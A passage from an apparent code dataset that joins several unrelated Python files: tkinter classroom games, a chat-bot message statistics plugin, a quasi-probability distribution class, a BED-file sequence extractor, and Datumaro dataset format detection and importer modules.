Button_1.grid(row=i+1, column=col, rowspan=rowpan, columnspan=colpan)
Button_1["font"] = ("arial", 12, "bold")
root.mainloop()
```
#### File: Python/110-2/0330_1.py
```python
from tkinter import *
import tkinter
from click import command
import random
from tkmacosx import Button
root = Tk()
root.title("配對遊戲")
contentVar = tkinter.StringVar(root, '剩餘次數'+str(50))
displayButton = Button(root, fg='white', bg='#3E4149', textvariable=contentVar,
width=500, height=50, borderless=1)
displayButton.grid(row=11, column=0, columnspan=10)
reset = Button(root, fg='white', bg='#CD4B1D', text='Reset',
width=500, height=50, borderless=1, command=lambda: reset_btn())
reset.grid(row=12, column=0, columnspan=10)
buttonList = []
empty = []
def reset_btn():
global buttonList, empty, token, token2, token1, counter, first, second
buttonList = []
empty = []
layout()
random_Num()
token = 0
token1 = -1
token2 = -1
counter = 50
first = 0
second = 0
contentVar.set('剩餘次數:'+str(counter))
def layout():
height = 50
width = 50
for i in range(100):
row = int(i/10)
col = i % 10
buttonList.append(StringVar())
empty.append(Button(root, textvariable=buttonList[i], borderless=1,
width=width, height=height, command=lambda n=i: click(n)))
empty[i].grid(row=row+1, column=col)
layout()
temp = []
index = []
# make random list
def random_Num():
global index, temp
temp = []
index = []
for i in range(10):
for j in range(10):
temp.append(i)
for i in range(100):
n = temp.pop(random.randint(0, (len(temp)-1)))
buttonList[i].set(n)
index.append(n)
random_Num()
token = 0
token1 = -1
token2 = -1
counter = 50
first = 0
second = 0
def click(n):
print("Clicked-----")
global token1, token2, token, counter, first, second
print(index[n])
if(token == 0):
token1 = index[n]
first = n
token = 1
print("Token1 = ", token1, "\tPlace = ", first)
elif(token == 1):
token2 = index[n]
second = n
token = 2
print("Token2 = ", token2, "\tPlace = ", second)
if(token1 == token2 and first != second):
buttonList[first].set('')
buttonList[second].set('')
empty[first].config(state="disabled")
empty[second].config(state="disabled")
token = 0
first = 0
second = 0
counter -= 1
token1 = -1
token2 = -1
elif((token1 != token2 and token == 2) or first == second):
empty[first].config(state="normal")
empty[second].config(state="normal")
token = 0
token1 = -1
token2 = -1
first = 0
second = 0
contentVar.set("剩餘次數:"+str(counter))
if(counter == 0):
contentVar.set("恭喜完成!")
reset_btn()
root.mainloop()
```
#### File: 110-2/0504/0504.py
```python
from tkinter import *
import tkinter
import random
import time
from threading import Timer
from tkmacosx import Button
import os
print('-------')
cwd = os.getcwd()
print(cwd)
print('------')
root = Tk()
root.title("麻阿台")
contentVar = tkinter.StringVar(root, 'GO')
displayButton = Button(root, fg='white', bg='#3E4149', textvariable=contentVar,
width=100, height=50, command=lambda: click())
displayButton.grid(row=3, column=3, columnspan=2)
displayButton = Button(root, fg='white', bg='#EA5532', text='Reset',
width=100, height=50, command=lambda: stop())
displayButton.grid(row=4, column=3, columnspan=2)
buttonList = []
empty = []
temp = []
width = 50
height = 50
cnt = 0
pictureList = [r"./For0504/apple.png",
"./For0504/betelnut.png",
"./For0504/double7.png",
"./For0504/grape.png",
"./For0504/orange.png",
"./For0504/ring.png",
"./For0504/star.png",
"./For0504/watermelon.png"]
# 外框陣列
squarelist = [0, 1, 2, 3, 4, 5, 6, 7,
15, 23, 31, 39, 47, 55,
63, 62, 61, 60, 59, 58, 57, 56,
48, 40, 32, 24, 16, 8]
speed = [0.1, 0.3, 0.5, 0.7, 0.9]
def click():
global time1, cnt
print("Click\t----------")
time1.start()
for i in squarelist:
cnt = i
def stop():
time1.cancel()
print("Stop\t----------")
runtimes = 0
before = 0
after = 0
def run():
global time1, runtimes, before, after, s, cnt
time1.cancel()
runtimes += 1
if(runtimes > 35):
stop()
runtimes = 0
else:
before = after
if(cnt >= len(squarelist)-1):
cnt = 0
else:
cnt += 1
after = cnt
empty[squarelist[before]].configure(bg='#FFFFFF')
empty[squarelist[after]].configure(bg='#EA5532')
# 控制速度
if(runtimes > 30):
s = 4
elif(runtimes > 24):
s = 3
elif(runtimes > 18):
s = 2
elif(runtimes > 10):
s = 1
elif(runtimes > 0):
s = 0
time1 = Timer(speed[s], run)
time1.start()
print("before = ", before, "after = ", after)
time1 = Timer(speed[0], run)
def reset_btn():
print("Reset\t----------")
global buttonList, empty
buttonList = []
empty = []
randomPic()
layout()
def randomPic():
for i in range(64):
num = random.randint(0, 7)
buttonList.append(PhotoImage(file=pictureList[num]))
def layout():
print("Create\t----------")
global temp, width, height, cnt
for i in range(64):
row = int(i/8)
col = i % 8
if(row == 0 or row == 7 or col == 0 or col == 7):
empty.append(
Button(root, image=buttonList[i], width=width, height=height))
else:
empty.append(Label(root))
if(row == 3 and (col == 3 or col == 4)):
empty[i].configure(bg='#3E4149')
if(row == 4 and (col == 3 or col == 4)):
empty[i].configure(bg='#EA5532')
empty[i].grid(row=row, column=col)
reset_btn()
root.mainloop()
```
#### File: 110-2/Midterm Exam/002.py
```python
from tkinter import *
import tkinter
from tkmacosx import Button
root = Tk()
root.title("按鈕位置") # 視窗標題
row = 5
Button_1 = Button()
contentVar = tkinter.StringVar(root, '')
buttonList = list()
def show(n, m):
contentVar.set('Row = ' + str(n) + ' Column = ' + str(m))
displayButton = Button(root, fg='white', bg='#3E4149', textvariable=contentVar,
width=250, height=50)
displayButton.grid(row=6, column=0, columnspan=5)
def layout(n):
height = 50
width = 50
for i in range(n*n):
row = int(i/n)
col = i % n
buttonList.append(StringVar())
Index = Button(root, textvariable=buttonList[i],
width=width, height=height,
command=lambda x=row, y=col: show(x, y))
Index.grid(row=row+1, column=col)
layout(5)
root.mainloop()
```
#### File: 110-2/Midterm Exam 2/002.py
```python
from tkinter import *
import tkinter
from random import randint
root = Tk()
root.title("剪刀石頭布")
Button_1 = Button()
contentVar = tkinter.StringVar(root, '')
buttonList = list()
displayButton = Button(root, fg='white', bg='#3E4149', textvariable=contentVar,
width=30, height=2)
displayButton.grid(row=0, column=0, columnspan=3)
displayButton["font"] = ("arial", 20, "bold")
buttonList = ['Y','O','W']
computerWin = 0
userWin = 0
tie = 0
def click(user):
global computerWin, userWin, tie
computer = buttonList[randint(0,2)]
if(computer == 'O'):
if(user == 'Y'):
computerWin += 1
elif(user == 'O'):
tie +=1
elif(user == 'W'):
userWin += 1
if(computer == 'W'):
if(user == 'O'):
computerWin += 1
elif(user == 'W'):
tie +=1
elif(user == 'Y'):
userWin += 1
if(computer == 'Y'):
if(user == 'W'):
computerWin += 1
elif(user == 'Y'):
tie +=1
elif(user == 'O'):
userWin += 1
contentVar.set('You:' + user + ', Computer:' + computer +'\nYou Win:' + str(userWin))
for i in range(3):
col = i
get_str = buttonList[i]
width = 7
height = 3
Button_1 = Button(root, text=buttonList[i], bg='#3E4149', fg='white',
width=width, height=height,
command=lambda x=get_str: click(x))
Button_1.grid(row=1,column=col)
Button_1["font"] = ("arial", 12, "bold")
root.mainloop()
```
|
{
"source": "Jengas/sketal",
"score": 2
}
|
#### File: plugins/content/content_statistics.py
```python
from handler.base_plugin import CommandPlugin
from utils import parse_user_name
import time
class StatisticsPlugin(CommandPlugin):
__slots__ = ()
def __init__(self, *commands, prefixes=None, strict=False):
"""Stores amount of messages for users in chats. Requires: StoragePlugin."""
if not commands:
commands = ("статистика",)
super().__init__(*commands, prefixes=prefixes, strict=strict)
async def global_before_message_checks(self, msg):
data = msg.meta["data_chat"]
if not data:
return
if "chat_statistics" not in data:
data["chat_statistics"] = {"users": {}}
statistics = data["chat_statistics"]
if msg.user_id not in statistics["users"]:
statistics["users"][msg.user_id] = {"messages": 0, "symbols": 0,
"last_message": time.time()}
user = statistics["users"][msg.user_id]
user["messages"] += 1
user["symbols"] += len(msg.full_text)
user["last_message"] = time.time()
async def process_message(self, msg):
if not msg.meta["data_chat"]:
return await msg.answer("✋ Статистика в личных сообщениях не учитывается.")
statistics = sorted(
msg.meta["data_chat"]["chat_statistics"]["users"].items(),
key=lambda item: (-item[1]["messages"], -item[1]["last_message"])
)[:10]
result = "👀 Немного статистики:\n"
for i, pack in enumerate(statistics):
uid, u = pack
if uid == self.api.get_current_id():
isbot = "(👾 бот) "
else:
isbot = ""
result += f"{i + 1}. {isbot}" + await parse_user_name(uid, msg) + \
f" (сообщений: {u['messages']}, символов: {u['symbols']}).\n"
await msg.answer(result)
```
|
{
"source": "jenglick/qiskit-runtime",
"score": 3
}
|
#### File: qiskit_runtime/circuit_runner/quasi.py
```python
from math import sqrt
from .probability import ProbDistribution
class QuasiDistribution(dict):
"""A dict-like class for representing qasi-probabilities.
"""
def __init__(self, data, shots=None):
"""Builds a quasiprobability distribution object.
Parameters:
data (dict): Input quasiprobability data.
shots (int): Number of shots the distribution was derived from.
"""
self.shots = shots
super().__init__(data)
def nearest_probability_distribution(self, return_distance=False):
"""Takes a quasiprobability distribution and maps
it to the closest probability distribution as defined by
the L2-norm.
Parameters:
return_distance (bool): Return the L2 distance between distributions.
Returns:
ProbDistribution: Nearest probability distribution.
float: Euclidean (L2) distance of distributions.
Notes:
Method from Smolin et al., Phys. Rev. Lett. 108, 070502 (2012).
"""
sorted_probs = dict(sorted(self.items(), key=lambda item: item[1]))
num_elems = len(sorted_probs)
new_probs = {}
beta = 0
diff = 0
for key, val in sorted_probs.items():
temp = val+beta/num_elems
if temp < 0:
beta += val
num_elems -= 1
diff += val*val
else:
diff += (beta/num_elems)*(beta/num_elems)
new_probs[key] = sorted_probs[key] + beta/num_elems
if return_distance:
return ProbDistribution(new_probs, self.shots), sqrt(diff)
return ProbDistribution(new_probs, self.shots)
```
|
{
"source": "jenhantao/abtba",
"score": 3
}
|
#### File: abtba/model_training/extract_sequences.py
```python
import sys
import os
import inspect
def read_bed_file(input_path):
'''
reads a bed file and returns the genomic coordinates
'''
with open(input_path) as f:
data = f.readlines()
coordinates = []
if data[0].strip()[0] == '#':
data = data[1:]
for line in data:
tokens = line.strip().split()
chrom = tokens[0]
start = tokens[1]
end = tokens[2]
coordinates.append((chrom,start, end))
return coordinates
def extract_sequence(coordinates, genome, out_file_path):
'''
Given a list of genomic coordinates, extracts sequences
inputs: [(chrom1, start1, end1), ..., (chromN, startN, endN)]
outputs: [seq1, seq2, ...seqN]
'''
script_path = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
genome_path = script_path + '/' + genome + '/'
chromosomes = [x.split('.')[0] for x in os.listdir(genome_path)]
chromosomes = [chrom for chrom in chromosomes if not 'chrUn' in chrom and not 'random' in chrom and not 'alt' in chrom]
chrom_size_dict = {}
chrom_seq_dict = {}
print('reading genome', genome)
for chrom in chromosomes:
with open(genome_path + chrom + '.fa') as f:
data = f.readlines()
seq = ''.join(x.upper().strip() for x in data[1:])
size = len(seq)
chrom_size_dict[chrom] = size
chrom_seq_dict[chrom] = seq
out_file = open(out_file_path, 'w')
for coord in coordinates:
chrom = coord[0]
# chrom_seq dict is 0 indexed, genome coords are 1 indexed
start = int(coord[1]) - 1
end = int(coord[2]) - 1
if chrom in chrom_seq_dict:
seq = chrom_seq_dict[chrom][start:end]
if len(seq)>0:
id_line = '>' + str(coord[0]) + ':' +str(coord[1]) + '-' + str(coord[2]) + '\n'
out_file.write(id_line)
out_file.write(seq + '\n')
else:
print(chrom, start, end, 'not found')
out_file.close()
if __name__ == '__main__':
if len(sys.argv) < 4:
print('Usage')
print('extract_sequences.py <bed file> <genome> <output_file_path>')
sys.exit(0)
else:
bed_path = sys.argv[1]
genome = sys.argv[2]
output_path = sys.argv[3]
coordinates = read_bed_file(bed_path)
extract_sequence(coordinates, genome, output_path)
```
|
{
"source": "jenhaoyang/datumaro",
"score": 2
}
|
#### File: cli/util/project.py
```python
from typing import Optional, Tuple
import os
import re
from datumaro.cli.util.errors import WrongRevpathError
from datumaro.components.dataset import Dataset
from datumaro.components.environment import Environment
from datumaro.components.errors import DatumaroError, ProjectNotFoundError
from datumaro.components.project import Project, Revision
from datumaro.util.os_util import generate_next_name
from datumaro.util.scope import on_error_do, scoped
def load_project(project_dir, readonly=False):
return Project(project_dir, readonly=readonly)
def generate_next_file_name(basename, basedir='.', sep='.', ext=''):
"""
If basedir does not contain basename, returns basename,
otherwise generates a name by appending sep to the basename
and the number, next to the last used number in the basedir for
files with basename prefix. Optionally, appends ext.
"""
return generate_next_name(os.listdir(basedir), basename, sep, ext)
def parse_dataset_pathspec(s: str,
env: Optional[Environment] = None) -> Dataset:
"""
Parses Dataset paths. The syntax is:
- <dataset path>[ :<format> ]
Returns: a dataset from the parsed path
"""
match = re.fullmatch(r"""
(?P<dataset_path>(?: [^:] | :[/\\] )+)
(:(?P<format>.+))?
""", s, flags=re.VERBOSE)
if not match:
raise ValueError("Failed to recognize dataset pathspec in '%s'" % s)
match = match.groupdict()
path = match["dataset_path"]
format = match["format"]
return Dataset.import_from(path, format, env=env)
@scoped
def parse_revspec(s: str, ctx_project: Optional[Project] = None) \
-> Tuple[Dataset, Project]:
"""
Parses Revision paths. The syntax is:
- <project path> [ @<rev> ] [ :<target> ]
- <rev> [ :<target> ]
- <target>
The second and the third forms assume an existing "current" project.
Returns: the dataset and the project from the parsed path.
The project is only returned when specified in the revpath.
"""
match = re.fullmatch(r"""
(?P<proj_path>(?: [^@:] | :[/\\] )+)
(@(?P<rev>[^:]+))?
(:(?P<source>.+))?
""", s, flags=re.VERBOSE)
if not match:
raise ValueError("Failed to recognize revspec in '%s'" % s)
match = match.groupdict()
proj_path = match["proj_path"]
rev = match["rev"]
source = match["source"]
target_project = None
assert proj_path
if rev:
target_project = load_project(proj_path, readonly=True)
project = target_project
# proj_path is either proj_path or rev or source name
elif Project.find_project_dir(proj_path):
target_project = load_project(proj_path, readonly=True)
project = target_project
elif ctx_project:
project = ctx_project
if project.is_ref(proj_path):
rev = proj_path
elif not source:
source = proj_path
else:
raise ProjectNotFoundError("Failed to find project at '%s'. " \
"Specify project path with '-p/--project' or in the "
"target pathspec." % proj_path)
if target_project:
on_error_do(Project.close, target_project, ignore_errors=True)
tree = project.get_rev(rev)
return tree.make_dataset(source), target_project
def parse_full_revpath(s: str, ctx_project: Optional[Project] = None) \
-> Tuple[Dataset, Optional[Project]]:
"""
revpath - either a Dataset path or a Revision path.
Returns: the dataset and the project from the parsed path
The project is only returned when specified in the revpath.
"""
if ctx_project:
env = ctx_project.env
else:
env = Environment()
errors = []
try:
return parse_dataset_pathspec(s, env=env), None
except (DatumaroError, OSError) as e:
errors.append(e)
try:
return parse_revspec(s, ctx_project=ctx_project)
except (DatumaroError, OSError) as e:
errors.append(e)
raise WrongRevpathError(problems=errors)
def split_local_revpath(revpath: str) -> Tuple[Revision, str]:
"""
Splits the given string into revpath components.
A local revpath is a path to a revision withing the current project.
The syntax is:
- [ <revision> : ] [ <target> ]
At least one part must be present.
Returns: (revision, build target)
"""
sep_pos = revpath.find(':')
if -1 < sep_pos:
rev = revpath[:sep_pos]
target = revpath[sep_pos + 1:]
else:
rev = ''
target = revpath
return rev, target
```
#### File: datumaro/components/format_detection.py
```python
from enum import IntEnum
from typing import (
Callable, Collection, Iterator, List, Optional, Sequence, TextIO, Union,
)
import contextlib
import fnmatch
import glob
import os.path as osp
from typing_extensions import NoReturn
class FormatDetectionConfidence(IntEnum):
"""
Represents the level of confidence that a detector has in a dataset
belonging to the detector's format.
"""
LOW = 10
"""
The dataset seems to belong to the format, but the format is too loosely
defined to be able to distinguish it from other formats.
"""
MEDIUM = 20
"""
The dataset seems to belong to the format, and is likely not to belong
to any other format.
"""
# There's no HIGH confidence yet, because none of the detectors
# deserve it. It's reserved for when the detector is sure that
# the dataset belongs to the format; for example, because the format
# has explicit identification via magic numbers/files.
# All confidence levels should be positive for a couple of reasons:
# * It makes it possible to use 0 or a negative number as a special
# value that is guaranteed to be less than any real value.
# * It makes sure that every confidence level is a true value.
assert all(level > 0 for level in FormatDetectionConfidence)
class FormatRequirementsUnmet(Exception):
"""
Represents a situation where a dataset does not meet the requirements
of a given dataset format.
More specifically, if this exception is raised, then it is necessary
(but may not be sufficient) for the dataset to meet at least
one of these requirements to be detected as being in that format.
Each element of `failed_alternatives` must be a human-readable
statement describing a requirement that was not met.
Must not be constructed or raised directly; use `FormatDetectionContext`
methods.
"""
def __init__(self, failed_alternatives: Sequence[str]) -> None:
assert failed_alternatives
self.failed_alternatives = tuple(failed_alternatives)
class FormatDetectionContext:
"""
An instance of this class is given to a dataset format detector.
See the `FormatDetector` documentation. The class should not
be instantiated directly.
A context encapsulates information about the dataset whose format
is being detected. It also offers methods that place requirements
on that dataset. Each such method raises a `FormatRequirementsUnmet`
exception if the requirement is not met. If the requirement _is_
met, the return value depends on the method.
"""
class _OneOrMoreContext:
failed_alternatives: List[str]
had_successful_alternatives: bool
def __init__(self) -> None:
self.failed_alternatives = []
self.had_successful_alternatives = False
# This points to a `_OneOrMoreContext` when and only when the detector
# is directly within a `require_any` block.
_one_or_more_context: Optional[_OneOrMoreContext]
def __init__(self, root_path: str) -> None:
self._root_path = root_path
self._one_or_more_context = None
@property
def root_path(self) -> str:
"""
Returns the path to the root directory of the dataset.
Detectors should avoid using this property in favor of specific
requirement methods.
"""
return self._root_path
def _is_path_within_root(self, path: str) -> bool:
"""
Checks that `path` is a relative path and does not attempt to leave
the dataset root by using `..` segments.
Requirement-placing methods that use this to verify their arguments
should raise a FormatRequirementsUnmet rather than a "hard" error like
AssertionError if False is returned. The reason is that the path passed
by the detector might not have been hardcoded, and instead might have
been acquired from another file in the dataset. In that case, an invalid
pattern signifies a problem with the dataset, not with the detector.
"""
if osp.isabs(path) or osp.splitdrive(path)[0]:
return False
path = osp.normpath(path)
if path.startswith('..' + osp.sep):
return False
return True
def _start_requirement(self, req_type: str) -> None:
assert not self._one_or_more_context, \
f"a requirement ({req_type}) can't be placed directly within " \
"a 'require_any' block"
def fail(self, requirement_desc: str) -> NoReturn:
"""
Places a requirement that is never met. `requirement_desc` must contain
a human-readable description of the requirement.
"""
self._start_requirement("fail")
raise FormatRequirementsUnmet((requirement_desc,))
def require_file(self, pattern: str, *,
exclude_fnames: Union[str, Collection[str]] = (),
) -> str:
"""
Places the requirement that the dataset contains at least one file whose
relative path matches the given pattern. The pattern must be a glob-like
pattern; `**` can be used to indicate a sequence of zero or more
subdirectories.
If the pattern does not describe a relative path, or refers to files
outside the dataset root, the requirement is considered unmet.
If the requirement is met, the relative path to one of the files that
match the pattern is returned. If there are multiple such files, it's
unspecified which one of them is returned.
`exclude_fnames` must be a collection of patterns or a single pattern.
If at least one pattern is supplied, then the placed requirement is
narrowed to only accept files with names that match none of these
patterns.
"""
self._start_requirement("require_file")
if isinstance(exclude_fnames, str):
exclude_fnames = (exclude_fnames,)
requirement_desc = \
f"dataset must contain a file matching pattern \"{pattern}\""
if exclude_fnames:
requirement_desc += ' (but not named ' + \
', '.join(f'"{e}"' for e in exclude_fnames) + ')'
if not self._is_path_within_root(pattern):
self.fail(requirement_desc)
pattern_abs = osp.join(glob.escape(self._root_path), pattern)
for path in glob.iglob(pattern_abs, recursive=True):
if osp.isfile(path):
# Ideally, we should provide a way to filter out whole paths,
# not just file names. However, there is no easy way to match an
# entire path with a pattern (fnmatch is unsuitable, because
# it lets '*' match a slash, which can lead to spurious matches
# and is not how glob works).
if any(fnmatch.fnmatch(osp.basename(path), pat)
for pat in exclude_fnames):
continue
return osp.relpath(path, self._root_path)
self.fail(requirement_desc)
@contextlib.contextmanager
def probe_text_file(
self, path: str, requirement_desc: str,
) -> Iterator[TextIO]:
"""
Returns a context manager that can be used to place a requirement on
the contents of the file referred to by `path`. To do so, you must
enter and exit this context manager (typically, by using the `with`
statement). On entering, the file is opened for reading in text mode and
the resulting file object is returned. On exiting, the file object is
closed.
The requirement that is placed by doing this is considered met if all
of the following are true:
* `path` is a relative path that refers to a file within the dataset
root.
* The file is opened successfully.
* The context is exited without an exception.
If the context is exited with an exception that was produced by another
requirement being unmet, that exception is reraised and the new
requirement is abandoned.
`requirement_desc` must be a human-readable statement describing the
requirement.
"""
self._start_requirement("probe_text_file")
requirement_desc_full = f"{path}: {requirement_desc}"
if not self._is_path_within_root(path):
self.fail(requirement_desc_full)
try:
with open(osp.join(self._root_path, path), encoding='utf-8') as f:
yield f
except FormatRequirementsUnmet:
raise
except Exception:
self.fail(requirement_desc_full)
@contextlib.contextmanager
def require_any(self) -> Iterator[None]:
"""
Returns a context manager that can be used to place a requirement that
is considered met if at least one of several alternative sets of
requirements is met.
To do so, use a `with` statement, with the alternative sets of
requirements represented as nested `with` statements using the context
manager returned by `alternative`:
with context.require_any():
with context.alternative():
# place requirements from alternative set 1 here
with context.alternative():
# place requirements from alternative set 2 here
...
The contents of all `with context.alternative()` blocks will be
executed, even if an alternative that is met is found early.
Requirements must not be placed directly within a
`with context.require_any()` block.
"""
self._start_requirement("require_any")
self._one_or_more_context = self._OneOrMoreContext()
try:
yield
# If at least one `alternative` block succeeded,
# then the `require_any` block succeeds.
if self._one_or_more_context.had_successful_alternatives:
return
# If no alternatives succeeded, and none failed, then there were
# no alternatives at all.
assert self._one_or_more_context.failed_alternatives, \
"a 'require_any' block must contain " \
"at least one 'alternative' block"
raise FormatRequirementsUnmet(
self._one_or_more_context.failed_alternatives)
finally:
self._one_or_more_context = None
@contextlib.contextmanager
def alternative(self) -> Iterator[None]:
"""
Returns a context manager that can be used in combination with
`require_any` to define alternative requirements. See the
documentation for `require_any` for more details.
Must only be used directly within a `with context.requirements()` block.
"""
assert self._one_or_more_context, \
"An 'alternative' block must be directly within " \
"a 'require_any' block"
saved_one_or_more_context = self._one_or_more_context
self._one_or_more_context = None
try:
yield
except FormatRequirementsUnmet as e:
saved_one_or_more_context.failed_alternatives.extend(
e.failed_alternatives)
else:
saved_one_or_more_context.had_successful_alternatives = True
finally:
self._one_or_more_context = saved_one_or_more_context
FormatDetector = Callable[
[FormatDetectionContext],
Optional[FormatDetectionConfidence],
]
"""
Denotes a callback that implements detection for a specific dataset format.
The callback receives an instance of `FormatDetectionContext` and must call
methods on that instance to place requirements that the dataset must meet
in order for it to be considered as belonging to the format.
Must return the level of confidence in the dataset belonging to the format
(or `None`, which is equivalent to the `MEDIUM` level)
or terminate via a `FormatRequirementsUnmet` exception raised by one of
the `FormatDetectionContext` methods.
"""
def apply_format_detector(
dataset_root_path: str, detector: FormatDetector,
) -> FormatDetectionConfidence:
"""
Checks whether the dataset located at `dataset_root_path` belongs to the
format detected by `detector`. If it does, returns the confidence level
of the detection. Otherwise, raises a `FormatRequirementsUnmet` exception.
"""
context = FormatDetectionContext(dataset_root_path)
if not osp.isdir(dataset_root_path):
context.fail(f"root path {dataset_root_path} must refer to a directory")
return detector(context) or FormatDetectionConfidence.MEDIUM
```
#### File: plugins/mapillary_vistas_format/importer.py
```python
import glob
import logging as log
import os.path as osp
from datumaro.components.extractor import DEFAULT_SUBSET_NAME, Importer
from .extractor import (
MapillaryVistasInstancesExtractor, MapillaryVistasPanopticExtractor,
)
from .format import MapillaryVistasPath, MapillaryVistasTask
class MapillaryVistasImporter(Importer):
_TASKS = {
MapillaryVistasTask.instances: MapillaryVistasInstancesExtractor,
MapillaryVistasTask.panoptic: MapillaryVistasPanopticExtractor,
}
@classmethod
def build_cmdline_parser(cls, **kwargs):
parser = super().build_cmdline_parser(**kwargs)
parser.add_argument('--use-original-config', action='store_true',
help="Use original config*.json file for your version of dataset")
parser.add_argument('--keep-original-category-ids', action='store_true',
help="Add dummy label categories so that category indices "
"correspond to the category IDs in the original annotation "
"file")
return parser
def __call__(self, path, **extra_params):
subsets = self.find_sources(path)
if len(subsets) == 0:
raise Exception("Failed to find Mapillary Vistas dataset at '%s'" % path)
tasks = list(set(task for subset in subsets.values() for task in subset))
selected_task = tasks[0]
if 1 < len(tasks):
log.warning(
"Found potentially conflicting source types: %s"
"Only one one type will be used: %s" \
% (','.join(task.name for task in tasks), selected_task.name)
)
if selected_task == MapillaryVistasTask.instances:
has_config = any([osp.isfile(osp.join(path, config))
for config in MapillaryVistasPath.CONFIG_FILES.values()])
if not has_config and not extra_params.get('use_original_config'):
raise Exception("Failed to find config*.json at '%s'. "
"See extra args for using original config" % path)
sources = [
{
'url': url,
'format': self._TASKS[task].NAME,
'options': dict(extra_params)
}
for _, subset_info in subsets.items()
for task, url in subset_info.items()
if task == selected_task
]
return sources
@classmethod
def find_sources(cls, path):
subsets = {}
suffixes = [
osp.join(ann_dir, subdir)
for ann_dir, subdirs in MapillaryVistasPath.ANNOTATION_DIRS.items()
for subdir in subdirs
]
for suffix in suffixes:
task = MapillaryVistasPath.CLASS_BY_DIR[osp.basename(suffix)]
if task not in cls._TASKS:
continue
if osp.isdir(osp.join(path, suffix)):
return {DEFAULT_SUBSET_NAME: {task: path}}
for ann_path in glob.glob(osp.join(path, '*', suffix)):
subset = osp.dirname(osp.dirname(osp.relpath(ann_path, path)))
subsets.setdefault(subset, {})[task] = osp.join(path, subset)
return subsets
class MapillaryVistasInstancesImporter(MapillaryVistasImporter):
_TASK = MapillaryVistasTask.instances
_TASKS = { _TASK: MapillaryVistasImporter._TASKS[_TASK] }
class MapillaryVistasPanopticImporter(MapillaryVistasImporter):
_TASK = MapillaryVistasTask.panoptic
_TASKS = { _TASK: MapillaryVistasImporter._TASKS[_TASK] }
```
#### File: datumaro/plugins/synthia_format.py
```python
from collections import OrderedDict
import os.path as osp
import numpy as np
from datumaro.components.annotation import (
AnnotationType, LabelCategories, Mask, MaskCategories,
)
from datumaro.components.extractor import DatasetItem, Importer, SourceExtractor
from datumaro.components.format_detection import FormatDetectionContext
from datumaro.util.image import find_images, load_image
from datumaro.util.mask_tools import generate_colormap, lazy_mask
from datumaro.util.meta_file_util import has_meta_file, parse_meta_file
class SynthiaPath:
IMAGES_DIR = 'RGB'
LABELS_SEGM_DIR = 'GT/LABELS'
SEMANTIC_SEGM_DIR = 'GT/COLOR'
LABELMAP_FILE = 'label_colors.txt'
SYNTHIA_LABEL_MAP = OrderedDict([
('Void', (0, 0, 0)),
('Sky', (128, 128, 128)),
('Building', (128, 0, 0)),
('Road', (128, 64, 128)),
('Sidewalk', (0, 0, 192)),
('Fence', (64, 64, 128)),
('Vegetation', (128, 128, 0)),
('Pole', (192, 192, 128)),
('Car', (64, 0, 128)),
('TrafficSign', (192, 128, 128)),
('Pedestrian', (64, 64, 0)),
('Bicycle', (0, 128, 192)),
('Lanemarking', (0, 172, 0)),
('Reserved_1', (0, 0, 0)),
('Reserved_2', (0, 0, 0)),
('TrafficLight', (0, 128, 128)),
])
def make_categories(label_map=None):
if label_map is None:
label_map = SYNTHIA_LABEL_MAP
categories = {}
label_categories = LabelCategories()
for label in label_map:
label_categories.add(label)
categories[AnnotationType.label] = label_categories
has_colors = any(v is not None for v in label_map.values())
if not has_colors: # generate new colors
colormap = generate_colormap(len(label_map))
else: # only copy defined colors
colormap = { label_id: (desc[0], desc[1], desc[2])
for label_id, desc in enumerate(label_map.values()) }
mask_categories = MaskCategories(colormap)
mask_categories.inverse_colormap # pylint: disable=pointless-statement
categories[AnnotationType.mask] = mask_categories
return categories
def parse_label_map(path):
label_map = OrderedDict()
with open(path, 'r', encoding='utf-8') as f:
for line in f:
# skip empty and commented lines
line = line.strip()
if not line or line[0] == '#':
continue
# color, name
label_desc = line.split()
if 2 < len(label_desc):
name = label_desc[3]
color = tuple([int(c) for c in label_desc[:3]])
else:
name = label_desc[0]
color = None
if name in label_map:
raise ValueError("Label '%s' is already defined" % name)
label_map[name] = color
return label_map
class SynthiaExtractor(SourceExtractor):
def __init__(self, path):
if not osp.isdir(path):
raise FileNotFoundError("Can't read dataset directory '%s'" % path)
super().__init__()
self._categories = self._load_categories(path)
self._items = list(self._load_items(path).values())
def _load_categories(self, path):
if has_meta_file(path):
return make_categories(parse_meta_file(path))
label_map_path = osp.join(path, SynthiaPath.LABELMAP_FILE)
if osp.isfile(label_map_path):
label_map = parse_label_map(label_map_path)
else:
label_map = SYNTHIA_LABEL_MAP
return make_categories(label_map)
def _load_items(self, root_dir):
image_dir = osp.join(root_dir, SynthiaPath.IMAGES_DIR)
if osp.isdir(image_dir):
images = {
osp.splitext(osp.relpath(p, image_dir))[0].replace('\\', '/'): p
for p in find_images(image_dir, recursive=True)
}
else:
images = {}
items = {}
inst_dir = osp.join(root_dir, SynthiaPath.LABELS_SEGM_DIR)
if osp.isdir(inst_dir):
gt_images = find_images(inst_dir, recursive=True)
for gt_img in gt_images:
item_id = osp.splitext(osp.relpath(gt_img, inst_dir))[0].replace('\\', '/')
anno = []
labels_mask = load_image(gt_img, dtype=np.uint16)
dynamic_objects = np.unique(labels_mask[:,:,1])
labels_mask = labels_mask[:,:,2]
segm_ids = np.unique(labels_mask)
for segm_id in segm_ids:
attr = { 'dynamic_object': False }
if segm_id != 0 and segm_id in dynamic_objects:
attr['dynamic_object'] = True
anno.append(Mask(
image=self._lazy_extract_mask(labels_mask, segm_id),
label=segm_id, attributes=attr))
items[item_id] = DatasetItem(id=item_id, image=images[item_id],
annotations=anno)
elif osp.isdir(osp.join(root_dir, SynthiaPath.SEMANTIC_SEGM_DIR)):
gt_dir = osp.join(root_dir, SynthiaPath.SEMANTIC_SEGM_DIR)
gt_images = find_images(gt_dir, recursive=True)
for gt_img in gt_images:
item_id = osp.splitext(osp.relpath(gt_img, gt_dir))[0].replace('\\', '/')
anno = []
inverse_cls_colormap = \
self._categories[AnnotationType.mask].inverse_colormap
color_mask = lazy_mask(gt_img, inverse_cls_colormap)
color_mask = color_mask()
classes = np.unique(color_mask)
for label_id in classes:
anno.append(Mask(image=self._lazy_extract_mask(color_mask, label_id),
label=label_id))
items[item_id] = DatasetItem(id=item_id, image=images[item_id],
annotations=anno)
return items
@staticmethod
def _lazy_extract_mask(mask, c):
return lambda: mask == c
class SynthiaImporter(Importer):
@classmethod
def detect(cls, context: FormatDetectionContext) -> None:
with context.require_any():
for prefix in (
